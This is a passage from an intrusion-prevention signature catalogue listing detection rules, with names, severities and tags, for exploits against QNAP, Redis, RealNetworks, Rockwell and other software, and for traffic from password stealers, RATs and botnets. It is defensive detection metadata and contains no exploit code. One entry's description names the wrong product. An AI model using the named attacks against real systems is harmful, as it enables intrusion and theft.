Tags: Any Operating System, Any Hardware, QNAP HBS 3 Hybrid Backup Sync, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1816-5242
Vulnerability: QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
Description:
Back to top

Generic_CS-QNAP-Transcode-Server-Command-Execution

About this situation: A QNAP Transcode Server Command Execution vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, QNAP Transcode Server, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: QNAP-Transcode-Server-Command-Execution
Description:
Back to top

Generic_CS-QNX-Phrelay-DoS

About this situation: An attempt to exploit a vulnerability in QNX phrelay
Context: TCP Client Stream Unknown
Severity: 7
Tags: QNX, Any Hardware, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: QNX-Phrelay-DoS
Description:
Back to top

Generic_CS-QNX-QCONN-Denial-Of-Service-Denial-Of-Service

About this situation: A vulnerability in QNX Qconn allowing denial of service and remote code execution.
Context: TCP Client Stream Unknown
Severity: 2
Tags: QNX, Any Hardware, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: QNX-QCONN-Denial-Of-Service
Description:
Back to top

Generic_CS-Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Qognify Ocularis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Qognify Ocularis, CVE2020, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Vulnerability: Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization
Description:
Back to top

Generic_CS-Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Quagga Quagga detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Quagga, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1038-5242
Vulnerability: Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service
Description:
Back to top

Generic_CS-Quagga-Daemon-BGP_Update_Receive-Double-Free

About this situation: An attempt to exploit a vulnerability in Quagga Quagga detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Quagga, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Vulnerability: Quagga-Daemon-BGP_Update_Receive-Double-Free
Description:
Back to top

Generic_CS-Quagga-Vty-Interface-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Quagga Quagga detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Quagga, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Quagga-Vty-Interface-Denial-Of-Service
Description:
Back to top

Generic_CS-Quest-Privilege-Manager-pmmasterd-Buffer-Overflow

About this situation: A Quest Privilege Manager pmmasterd Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, Quest Privilege Manager, CVE2017, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1014-5242
Last changed: sgpkg-ips-1014-5242
Vulnerability: Quest-Privilege-Manager-pmmasterd-Buffer-Overflow
Description:
Back to top

Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting

About this situation: An attempt to exploit a vulnerability in Embarcadero Interbase detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Quest Software Big Brother, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-391-4219
Vulnerability: Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting
Description:
Back to top

Generic_CS-QuickTime-Darwin-Streaming-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Quicktime and Darwin Streaming Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Darwin Streaming Server, QuickTime Streaming Server, CVE2004, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: QuickTime-Darwin-Streaming-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Ramnit-Activity

About this situation: Ramnit activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Ramnit
Description:
Back to top

Generic_CS-RealFlex-RealWin-Buffer-Overflow-Attempt

About this situation: An attempt to exploit a vulnerability in RealFlex RealWin SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, RealFlex RealWin SCADA System, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: RealFlex-RealWin-Multiple-Buffer-Overflows
Description:
Back to top

Generic_CS-RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealFlex RealWin SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealFlex RealWin SCADA System, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow
Description:
Back to top

Generic_CS-RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealFlex RealWin SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, RealFlex RealWin SCADA System, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow
Description:
Back to top

Generic_CS-RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealFlex RealWin SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealFlex RealWin SCADA System, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow
Description:
Back to top

Generic_CS-RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealFlex RealWin SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, RealFlex RealWin SCADA System, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow
Description:
Back to top

Generic_CS-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Mobile Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Server, RealNetworks Helix Mobile Server, CVE2012, Any Operating System not specific, RealNetworks Helix Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Vulnerability: RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
Description:
Back to top

Generic_CS-RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Mobile Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix DNA Server, RealNetworks Helix Server, RealNetworks Helix Mobile Server, CVE2008, Any Operating System not specific, RealNetworks Helix Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-577-5211
Vulnerability: RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-RealNetworks-Helix-Server-RTSP-GET-Long-URI

About this situation: A long URI in GET-request for RealNetworks Helix Server detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, RealNetworks Helix Server, CVE2002, Any Operating System not specific, RealNetworks Helix Server not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: RealNetworks-Helix-Server-RTSP-GET-Long-URI
Description:
Back to top

Generic_CS-RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Universal Server, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1645-5242
Vulnerability: RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS
Description:
Back to top

Generic_CS-RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Server detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Linux, Any Hardware, RealNetworks Helix Server, CVE2009, Windows not specific, Linux not specific, RealNetworks Helix Server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-410-4219
Vulnerability: RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service
Description:
Back to top

Generic_CS-RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Mobile Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Server, RealNetworks Helix Mobile Server, CVE2012, Any Operating System not specific, RealNetworks Helix Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-625-5211
Vulnerability: RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS
Description:
Back to top

Generic_CS-RealNetworks-Helix-Transport-Header-Overflow

About this situation: Buffer overflow in RealNetworks Helix Universal Server Transport header
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Server, CVE2002, Any Operating System not specific, RealNetworks Helix Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: RealNetworks-Helix-Transport-Header-Overflow
Description:
Back to top

Generic_CS-RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Universal Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Universal Server, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability
Description:
Back to top

Generic_CS-Recslurp-Botnet-Traffic

About this situation: Recslurp botnet traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: Recslurp-Botnet
Description:
Back to top

Generic_CS-Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Red Hat JBoss Data Grid detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat JBoss Data Grid, CVE2017, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization
Description:
Back to top

Generic_CS-Redhat-Jboss-JNDI-Lack-of-Authentication

About this situation: A Redhat Jboss JNDI Lack of Authentication vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Red Hat Linux, Any Hardware, Red Hat JBoss Enterprise Application Platform, CVE2011, Red Hat Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Redhat-Jboss-JNDI-Lack-of-Authentication
Description:
Back to top

Generic_CS-Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Vulnerability: Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Redis-Hrandfield-Zrandmember-Command-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Vulnerability: Redis-Hrandfield-Zrandmember-Command-Integer-Overflow
Description:
Back to top

Generic_CS-Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis Labs Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis Labs Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Redis-Lua-Sandbox-Escape-CVE-2022-0543

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1476-5242
Vulnerability: Redis-Lua-Sandbox-Escape-CVE-2022-0543
Description:
Back to top

Generic_CS-Redis-Lua-Scripting-Component-Getnum-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis Labs Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Redis-Lua-Scripting-Component-Getnum-Integer-Overflow
Description:
Back to top

Generic_CS-Redis-Msetnx-Command-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Redis-Msetnx-Command-Denial-Of-Service
Description:
Back to top

Generic_CS-Redis-Replication-Code-Execution

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Redis, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Redis-Replication-Code-Execution
Description:
Back to top

Generic_CS-Redis-Scan-Keys-Command-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Redis detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Redis-Scan-Keys-Command-Denial-Of-Service
Description:
Back to top

Generic_CS-Redis-Setrange-Sort-Command-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2022, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: Redis-Setrange-Sort-Command-Integer-Overflow
Description:
Back to top

Generic_CS-Redis-SSH-Authorized-Keys-Overwrite

About this situation: An attempt to exploit a vulnerability in Redis Labs Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Redis-SSH-Authorized-Keys-Overwrite
Description:
Back to top

Generic_CS-Redis-Unauthenticated-Code-Execution

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Redis, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1200-5242
Vulnerability: Redis-Unauthenticated-Code-Execution
Description:
Back to top

Generic_CS-Redis-Xautoclaim-Command-Count-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Redis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Redis, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1511-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Redis-Xautoclaim-Command-Count-Integer-Overflow
Description:
Back to top

Generic_CS-Redline-Password-Stealer-Infection-Traffic

About this situation: Redline Password Stealer infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Redline-Password-Stealer-Infection-Traffic
Description:
Back to top

Generic_CS-Remcos-RAT-C2-Traffic

About this situation: Remcos RAT C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Remcos-RAT-C2-Traffic
Description:
Back to top

Generic_CS-Remote-Desktop-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2012-03, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-445-4219
Vulnerability: Remote-Desktop-Code-Execution-Vulnerability
Description:
Back to top

Generic_CS-Remote-Desktop-EsteemAudit-Client-Request

About this situation: A suspicious Remote Desktop client request was detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-924-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: EsteemAudit-Exploit-Tool
Description:
Back to top

Generic_CS-Remote-Desktop-Protocol-Vulnerability

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2012-08, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Remote-Desktop-Protocol-Vulnerability
Description:
Back to top

Generic_CS-Remote-Mouse-RCE

About this situation: An attempt to exploit a vulnerability in Remote Mouse detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Remote Mouse, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Remote-Mouse-RCE
Description:
Back to top

Generic_CS-RevengeRAT-Malware-C2-Traffic

About this situation: RevengeRAT malware C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1144-5242
Vulnerability: RevengeRAT-Malware-C2-Traffic
Description:
Back to top

Generic_CS-Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Rockwell Automation RSLinx Classic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation RSLinx Classic, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1127-5242
Vulnerability: Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Rockwell Automation RSLinx Classic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation RSLinx Classic, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1172-5242
Vulnerability: Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-BOF
Description:
Back to top

Generic_CS-Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS

About this situation: An attempt to exploit a vulnerability in Rockwell Automation RSLinx Classic detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation RSLinx Classic, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS
Description:
Back to top

Generic_CS-Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Rockwell Automation RSLogix 5000 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation RSLogix 5000, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Vulnerability: Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
